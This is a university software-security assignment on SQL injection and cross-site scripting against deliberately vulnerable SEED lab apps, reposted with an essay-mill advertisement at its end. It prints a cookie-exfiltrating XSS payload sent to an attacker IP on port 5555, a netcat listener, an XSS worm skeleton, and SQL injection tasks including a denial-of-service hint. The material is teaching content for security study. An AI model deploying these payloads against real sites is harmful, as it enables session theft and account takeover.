Software Security Assignment II

FIT 3173 Software Security Assignment II (S1 2020)
Total Marks 100
1 Overview
The learning objective of this assignment is for you to gain a first-hand experience on SQL injection attacks
and cross-site scripting attacks and get a deeper understanding on how to exploit the vulnerability in realworld
web applications. All tasks in this assignment can be done on “SeedVM” as used in labs.
2 Submission Policy
You need to submit a lab report to describe what you have done and what you have observed with screen
shots whenever necessary; you also need to provide explanation or codes to the observations that are interesting
or surprising. In your report, you need to answer all the questions listed in this manual. Please answer
each question using at most 100 words. Typeset your report into .pdf format (make sure it can be opened
with Adobe Reader) and name it as the format: [Your Name]-[Student ID]-FIT3173-Assignment2, e.g.,
HarryPotter-12345678-FIT3173-Assignment2.pdf.
All source code if required should be embedded in your report. In addition, if a demonstration video is
required, you should record your screen demonstration with your voice explanation and upload the video
to your Monash Google Drive. The shared URL of the video should be mentioned in your report wherever
required.Youcanusethisfreetooltomakethevideo:
are also fine. Then, please upload the PDF file to Moodle. Note: the assignment is due on
.
Late submission penalty: 10 points deduction per day. If you require a special consideration, the
application should be submitted to the central university. Zero tolerance on plagiarism: If you are
found cheating, penalties will be applied, i.e., a zero grade for the unit. University polices can be found at
.
3 SQL Injection Attack – Using SQLi Lab [50 Marks]
SQL injection is a code injection technique that exploits the vulnerabilities in the interface between web applications
and database servers. The vulnerability is presented when user’s inputs are not correctly checked
within the web applications before sending to the back-end database servers.
Many web applications take inputs from users, and then use these inputs to construct SQL queries, so
the web applications can pull the information out of the database. Web applications also use SQL queries
to store information in the database. These are common practices in the development of web applications.
When the SQL queries are not carefully constructed, SQL-injection vulnerabilities can occur. SQL-injection
attacks is one of the most frequent attacks on web applications.
In this part, we modify a web application called SQLi Lab, which is designed to be vulnerable to
the SQL-Injection attack. Although the vulnerabilities are artificially created, they capture the common
mistakes made by many web developers. Your goal in this part is to find ways to exploit the SQL-injection
vulnerabilities, demonstrate the damage that can be achieved by the attacks, and master the techniques that
can mitigate such attacks.
1
The database of SQLi Lab, named Users, can be traced and manipulated when we login to MySQL
Console by using following commands:
mysql -u root -pseedubuntu
show databases;
use Users;
describe credential;
3.1 Task 1: SQL Injection Attack on SELECT Statements [5 Marks]
In this task, you need to manage to log into SQLi Lab at www.seedlabsqlinjection.com, without
providing a password. You can achieve this by using SQL injection. Normally, before users start using SQLi
Lab, they need to login using their user names and passwords. SQLi Lab displays a login window to users
and ask them to input username and password. The login window is displayed in the following:
The authentication function is implemented by unsafe home.php in the SQLi Lab root directory
(i.e., /var/www/SQLInjection/). It uses the user-provided data to find out whether they match with
the Username and Password fields of any record in the database. If there is a match, it means the user
has provided a correct username and password combination, and should be allowed to login. Like most web
applications, PHP programs interact with their back-end databases using the standard SQL language. In
SQLi Lab, the following SQL query is constructed in unsafe home.php to authenticate users:
// create a connection
$conn = getDB();
// Sql query to authenticate the user
$sql = “SELECT id, name, eid, salary, birth, ssn,
phoneNumber, address, email,nickname,Password
FROM credential
WHERE name= ’$input_uname’ and Password=’$hashed_pwd’”;
// query
$result = $conn->query(sql);
if (found one record)
then {allow the user to login}
In the above SQL statement, the variable $input uname holds the string typed in the Username textbox,
and $hashed pwd holds the string typed in the Password textbox. User’s inputs in these two textboxs
are placed directly in the SQL query string.
Q1: There is a SQL-injection vulnerability in the above query. Can you log into another person’s
account without knowing the correct password? Explain your solution. Hint: you are not required to
2
change the code. [Marking scheme: In your report, 2.5 marks for the screenshot and 2.5 marks for the
explanation and solution]
3.2 Task 2: SQL Injection on UPDATE Statements [10 Marks]
In this task, you need to make an unauthorised modification to the database. Your goal is to modify another
user’s profile using SQL injections. In SQLi Lab, if users want to update their profiles, they can click
the Edit Profile link on the navigation bar, and then fill out a form to update the profile information.
After the user sends the update request to the server, an UPDATE SQL statement will be constructed in
unsafe edit backend.php. The objective of this statement is to modify the current user’s profile
information in the credential table. There is a SQL injection vulnerability in this SQL statement.
Please find the vulnerability, and then use it to do the following task:
Q2: Please point out the potential vulnerability, and explain how to achieve a SQL Injection attack
by utilizing it. [Marking scheme: In your report, 2.5 marks for the screenshot and 2.5 marks for the
explanation]
Q3: Change another user’s profile without knowing his/her password. For example, if you are
logged in as Alice, your goal is to use the vulnerability to modify Ted’s profile information (at least
three items), including Ted’s password. After the attack, you should be able to log into Ted’s account.
Explain your solution, and provide the screen shots to support your ideas. Hint: the passwords stored
in database are hashed (SHA1). If you incorrectly modify the user name or password, you can recover by
directly accessing the MySQL. [Marking scheme: 2.5 marks for the screenshot and 2.5 marks for the
explanation and solutions]
3.3 Task 3: Countermeasure for UPDATE Statements[10 Marks]
Setup Remark: You need to set the read/write permission for the seed user on the current website directory
before doing this task by following the below commands on your terminal. Note that the . is important to
indicate the path to the current directory.
$ cd /var/www/SQLInjection/
$ sudo chmod -R 777 .
In this task, you need to enable the prepared statement as a countermeasure against the SQL injection
attacks. Here is an example of how to write a prepared statement based on the SELECT statement in Task 1.
$sql = “SELECT id, name, eid, salary, birth, ssn,
phoneNumber, address, email,nickname,Password
FROM credential
WHERE name= ’$input_uname’ and Password=’$hashed_pwd’”;
You can use the prepared statement to rewrite the above code that is vulnerable to SQL injection attacks:
$stmt = $conn->prepare(“SELECT id, name, eid, salary, birth, ssn,
phoneNumber, address, email,nickname,Password
FROM credential
WHERE name= ? and Password= ?”);
$stmt->bind_param(“ss”, $input_uname, $hashed_pwd);
$stmt->execute();
3
$stmt->bind_result($id, $name, $eid, $salary, $birth, $ssn,
$phoneNumber, $address, $email, $nickname, $pwd);
$stmt->fetch();
$stmt->close();
Q4: Following the above steps to fix the SQL injection vulnerability of UPDATE statement on the
Edit Profile page. Then, check whether you can still exploit the vulnerability or not. Provide your
code, and briefly explain your solution with screenshots. Hint: the UPDATE statement is located in
unsafe edit backend.php. [Marking scheme: In your report, 5 marks for the screenshot and 5
marks for the explanation and solutions]
3.4 Task 4: Second order Attacks [25 Marks]
In this task, you need to perform second order attacks to achieve different adversarial goals. Unlike direct
injection flaws that execute injected queries immediately, second order attacks delay the execution until a
later time. This means a malicious user can first inject a query fragment into a query as a trusted source.
Then, the injected SQL will be executed in a secondary query that is vulnerable to SQL injection.
We have extended SQLi Lab to assist you in exploring second order attacks and completing this task.
You need to download all PHP source files of unsafe home.php, unsafe edit frontend.php,
unsafe task load.php, unsafe view order.php, and unsafe tasks view.php from Moodle
and place them to the same website’s directory. For instance, you can follow a below command to copy
the file unsafe home.php located in /home/seed/Documents to that website’s directory.
$ su root
Password: (enter root password “seedubuntu”)
# cp /home/seed/Documents/unsafe_home.php /var/www/SQLInjection/
We also upgraded the database of SQLi Lab to enrich the website’s features. That are, a user can
add tasks, set task sort preference, and view all his/her declared tasks. Note that you need to download a
database script file, script.sql, from Moodle and execute it with MySQL Console before you can use
these new features. For instance, you can follow the below commands to execute that script when it is stored
in /home/seed/Documents. The execution will update your database scheme and insert new data as
follows:
mysql -u root -pseedubuntu
show databases;
use Users;
source /home/seed/Documents/script.sql
 Table tasks(TaskID,Name,Hours,Amount,Description,Owner,Type) stores the tasks
of users, in which tasks(Owner) is a foreign key referring to credential(ID). Hence, only
existing users in the table credential can create new tasks.
You can use the command describe tasks; to know more information about this table scheme.
 Table preference(PreferenceID,favourite,Owner) records the task sort preference of
users, in which preference(Owner) is a foreign key referring to credential(ID). Existing
users can select one of the task information as their sorting favourite. For instance, a following figure
4
demonstrates how Alice can set her perference as Hours increasing. You can use the command
describe preference; to know more information about this table scheme.
 Function userIdMaxTasks() returns the ID of an user who has the maximum number of tasks in
your database. In MySQL console, you can use the command select userIdMaxTasks(); to
retrieve that result.
 Function generateRandomUser() adds a new random user (with random Name and Password
to the table credential). In MySQL console, you can use the command select generateRandomUser();
to perform this addition.
 Function getNewestUserId() returns the ID of a newly created user in the table credential.
 Stored procedure copyTasksToUser(in userID int(6) UNSIGNED) copies all tasks of
other users to the user having that userID. You need to make sure the user with that userID exists
in the table credential before using this stored procedure. For instance, in MySQL console,
you can use the command call copyTasksToUser(6); to copies all tasks of other users to an
existing user with userID=6.
Q5: In a normal scenario, an user can add a new task multiple times and update his/her view
preference with sorting by asc or desc. However, the website is vulnerable to the second order
attacks when the user views all tasks. You can choose one of the following options to complete this
task. Note that, you will get 0 mark if you complete the task by not performing second order attack
(i.e. manipulate the database manually in MySQL console).
Option 1 (5 marks): You need to perform the attack to display all the tasks of the user who has the
maximum number of tasks when you view your tasks. [Marking scheme: In your recording, 5 marks
only given if you have a solid demonstration and explanation about how you inject queries and the
attack works in your case.]. You also need to provide nessessary screenshots in your report. Then, you
need to upload your demo video to your Monash Google Drive and embed its shared link to your report so
that the teaching team can view and verify your works.
If you achieve the adversarial goal successfully, you will obtain the result like the following figure. Note
that, the second table in the figure displays the tasks of that victim.
5
Option 2 (15 marks): You need to perform a sequence of the second order attacks in order to transfer
all the tasks of users to a new macilious user that you created. Note that creating that macilious user also has
to be done by using the second order attack. [Marking scheme: In your recording, 15 marks only given
if you have a solid demonstration and explanation about how you inject queries and the attack works
in your case to achieve that adversarial goal.]. You also need to provide nessessary screenshots in your
report. Then, you need to upload your demo video to your Monash Google Drive and embed its shared link
to your report so that the teaching team can view and verify your works.
If you achieve the adversarial goal successfully, you will obtain the result like the following figure. Note
that, the second table in the figure displays the malicious user who has the maximum number of tasks. The
first table is blank due to no task remains for Ted user.
Q6: (5 marks) This opening question is independent from your selected option in Q5. In this
6
question, you need to perform a second order attack on SQLi Lab to attack the performance of
your MySQL server.. [Marking scheme: In your recording, 5 marks only given if you have a solid
demonstration and explanation about how you inject queries and the attack works in your case.]. You
also need to provide nessessary screenshots in your report. Then, you need to upload your demo video to
your Monash Google Drive and embed its shared link to your report so that the teaching team can view and
verify your works. Hint: you can delay the query execution or shut down your MySQL server when an user
views his/her declared tasks.
Q7: (5 marks): Provide your theoretical mitigation solution against the second order attacks in
your selected option of Q5. You do not need to change the PHP source files for this question. [Marking
scheme: 5 marks only given if you have a solid explanation in your report.]
4 Cross-Site Scripting (XSS) Attack – Using Elgg [50 Marks]
Cross-site scripting (XSS) is a type of vulnerability commonly found in web applications. This vulnerability
makes it possible for attackers to inject malicious code (e.g. JavaScript programs) into victim’s web browser.
Using this malicious code, attackers can steal a victim’s credentials, such as session cookies. The access
control policies (i.e., the same origin policy) employed by the browsers to protect those credentials can be
bypassed by exploiting the XSS vulnerability. Vulnerabilities of this kind can potentially lead to large-scale
attacks.
To demonstrate what attackers can do by exploiting XSS vulnerabilities, we have set up a web application
named Elgg in our pre-built Ubuntu VM image. Elgg is a very popular open-source web application
for social network, and it has implemented a number of countermeasures to remedy the XSS threat. To
demonstrate how XSS attacks work, we have commented out these countermeasures in Elgg in our installation,
intentionally making Elgg vulnerable to XSS attacks. Without the countermeasures, users can post
any arbitrary message, including JavaScript programs, to the user profiles. You need to exploit this vulnerability
by posting some malicious messages to their profiles; users who view these profiles will become
victims.
4.1 Environment Configuration
This lab can only be conducted in the “SeedVM” we provided, because of the configurations that we have
performed to support this lab. In this part, we need three things, are of which are already installed in
the provided VM image: (1) the Firefox web browser, (2) the Apache web server, and (3) the Elgg web
application.
For the browser, we need to use the HTTP Header Live extension for Firefox to inspect the HTTP requests
and responses. From the Firefox web browser in the VM, you can download and install this extension.
ElggWeb Application. We use an open-source web application called Elgg in this lab. Elgg is a webbased
social-networking application. It is already set up in the pre-built Ubuntu VM image. We have also
created several user accounts on the Elgg server and the credentials are given in Table 1.
DNS Configuration. We have configured the following URL needed for this lab. The folder where the
web application is installed and the URL to access this web application are described in the following:
URL: http://www.xsslabelgg.com/
7
Table 1: User credentials
User UserName Password
Admin admin seedelgg
Alice alice seedalice
Boby boby seedboby
Charlie charlie seedcharlie
Samy samy seedsamy
Folder: /var/www/XSS/Elgg
The above URL is only accessible from inside of the virtual machine, because we have modified the
/etc/hosts file to map the domain name of each URL to the virtual machine’s local IP address (127.0.0.1).
You may map any domain name to a particular IP address using /etc/hosts. For example, you can map
http://www.example.com to the local IP address by appending the following entry to /etc/hosts:
127.0.0.1 www.example.com
If your web server and browser are running on two different machines, you need to modify /etc/hosts
on the browser’s machine accordingly to map these domain names to the web server’s IP address, not to
127.0.0.1.
Apache configuration. In our pre-built VM image, we used Apache server to host all the web sites used in
the lab. The name-based virtual hosting feature in Apache could be used to host several web sites (or URLs)
on the same machine. A configuration file named 000-default.conf in the directory ”/etc/apache2/sitesavailable”
contains the necessary directives for the configuration:
Inside the configuration file, each web site has a VirtualHost block that specifies the URL for the web
site and directory in the file system that contains the sources for the web site. The following examples
show how to configure a website with URL http://www.example1.com and another website with URL
http://www.example2.com:
<VirtualHost *>
ServerName http://www.example1.com
DocumentRoot /var/www/Example1
</VirtualHost>
<VirtualHost *>
ServerName http://www.example2.com
DocumentRoot /var/www/Example2
</VirtualHost>
You may modify the web application by accessing the source in the mentioned directories. For example,
with the above configuration, the web application http://www.example1.com can be changed by modifying
the sources in the /var/www/Example1/ directory. After a change is made to the configuration, the Apache
server needs to be restarted. See the following command:
$ sudo service apache2 start
8
4.2 Task 1: Posting a Malicious Message to Display an Alert Window [10 Marks]
The objective of this task is to embed a JavaScript program in your Elgg profile, such that when another
user views your profile, the JavaScript program will be executed and an alert window will be displayed. The
following JavaScript program will display an alert window:
<script>alert(’How are you?’);</script>
If you embed the above JavaScript code in your profile (e.g. in the brief description field), then any user
who views your profile will see the alert window.
In this case, the JavaScript code is short enough to be typed into the brief description field. If you want
to run a long JavaScript, but you are limited by the number of characters you can type in the form, you can
store the JavaScript program in a standalone file, save it with the .js extension, and then refer to it using the
src attribute in the <script> tag. See the following example:
<script type=”text/javascript”
src=”http://www.example.com/myscripts.js”>
</script>
In the above example, the page will fetch the JavaScript program from http://www.example.com,
which can be any web server.
Q1: Try to fetch the JavaScript from a server. Describe your observation, and provide the screen
shot to show the alert. Hint: You need to setup a server (e.g. www.example.com) and put the above
JavaScript there. You can modify one user’s profile (e.g., alice), and view his/her profile by admin. [Marking
scheme: In your report, 5 marks for the screenshot. In your recording, 5 marks for the demonstration,
and explanation and solutions.]
4.3 Task 2: Stealing Cookies from the Victim’s Machine [20 Marks]
The objective of this task is to steal the cookies from the victim’s machine. First, we can embed a JavaScript
program in your Elgg profile, such that when another user views your profile, the user’s cookies will be
displayed in the alert window. This can be done by adding some additional code to the JavaScript program
in the previous task:
<script>alert(document.cookie);</script>
The malicious JavaScript code written by the attacker can print out the user’s cookies, but only the user
can see the cookies, not the attacker. In this task, the attacker wants the JavaScript code to send the cookies
to himself/herself. To achieve this, the malicious JavaScript code needs to send an HTTP request to the
attacker, with the cookies appended to the request.
We can do this by having the malicious JavaScript insert an <img> tag with its src attribute set to the
attacker’s machine. When the JavaScript inserts the <img> tag, the browser tries to load the image from
the URL in the src field; this results in an HTTP GET request sent to the attacker’s machine. The JavaScript
given below sends the cookies to the port 5555 of the attacker’s machine (with IP address 10.1.2.5),
where the attacker has a TCP server listening to the same port.
<script>document.write(’<img src=http://attacker_IP_address:5555?c=’
+ escape(document.cookie) + ’ >’);
</script>
9
A commonly used program by attackers is netcat (or nc) , which, if running with the ”-l” option,
becomes a TCP server that listens for a connection on the specified port. This server program basically
prints out whatever is sent by the client and sends to the client whatever is typed by the user running the
server. Type the command below to listen on port 5555:
$ nc -l 5555 -v
The ”-l” option is used to specify that nc should listen for an incoming connection rather than initiate
a connection to a remote host. The ”-v” option is used to have nc give more verbose output. The task can
also be done with only one VM instead of two. For one VM, you should replace the attacker’s IP address in
the above script with 127.0.0.1. Start a new terminal and then type the nc command above.
Q2: Accomplish the above attack, and use the TCP server program to detect the fetched cookie.
Provide your screenshots in your report and your video demonstration evidence to support and verify
that you have performed the attack and it worked successfully. You need to upload your demo video
to your Monash Google Drive and embed its shared link to your report so that the teaching team can view
and verify your works. Hint: the IP address in your local host can be set 127.0.0.1. [Marking scheme:
10 marks for the screenshots in the report, and 10 marks for the demonstration, and explanation and
solutions in the recording]
4.4 Task 3: Modifying the Victim’s Profile [20 Marks]
The objective of this task is to modify the victim’s profile when the victim visits Samy’s page. We will write
an XSS worm to complete the task.
We need to write a malicious JavaScript program that forges HTTP requests directly from the victim’s
browser, without the intervention of the attacker. To modify profile, we should first find out how a legitimate
user edits or modifies his/her profile in Elgg. More specifically, we need to figure out how the HTTP POST
request is constructed to modify a user’s profile. We will use Firefox’s HTTP inspection tool. Once we
understand how the modify-profile HTTP POST request looks like, we can write a JavaScript program to
send out the same HTTP request. We provide a skeleton JavaScript code that aids in completing the task.
<script type=”text/javascript”>
window.onload = function(){
//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
//and Security Token __elgg_token
var userName=elgg.session.user.name;
var guid=”&guid=”+elgg.session.user.guid;
var ts=”&__elgg_ts=”+elgg.security.token.__elgg_ts;
var token=”&__elgg_token=”+elgg.security.token.__elgg_token;
var name=”&name=”+userName;
//Construct the content of your url.
var desc=…; //FILL IN
var content=…; //FILL IN
var samyGuid=…; //FILL IN
if(elgg.session.user.guid!=samyGuid){
//Create and send Ajax request to modify profile
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open(“POST”,sendurl,true);
10
Ajax.setRequestHeader(“Host”,”www.xsslabelgg.com”);
Ajax.setRequestHeader(“Content-Type”,
“application/x-www-form-urlencoded”);
Ajax.send(content);
}
}
</script>
The above code should be placed in the ”About Me” field of Samy’s profile page. This field provides
two editing modes: Editor mode (default) and Text mode. The Editor mode adds extra HTML code to the
text typed into the field, while the Text mode does not. Since we do not want any extra code added to our
attacking code, the Text mode should be enabled before entering the above JavaScript code. This can be
done by clicking on ”Edit HTML”, which can be found at the top right of the ”About Me” text field.
Q3: Accomplish the above attack, and provide your screenshots in your report and your video
demonstration evidence to support and verify that you have performed the attack and it worked
successfully. You need to upload your demo video to your Monash Google Drive and embed its shared link
to your report so that the teaching team can view and verify your works. Hint: You may use HTTP inspection
tool to see the HTTP request look like. [Marking scheme: 10 marks for the screenshots in the report,
and 10 marks for the demonstration, and explanation and solutions in the recording]
11

Don't use plagiarized sources. Get Your Custom Essay on
Software Security Assignment II
For $10/Page 0nly
Order Essay
Calculator

Calculate the price of your paper

Total price:$26

Need a better grade?
We've got you covered.

Order your paper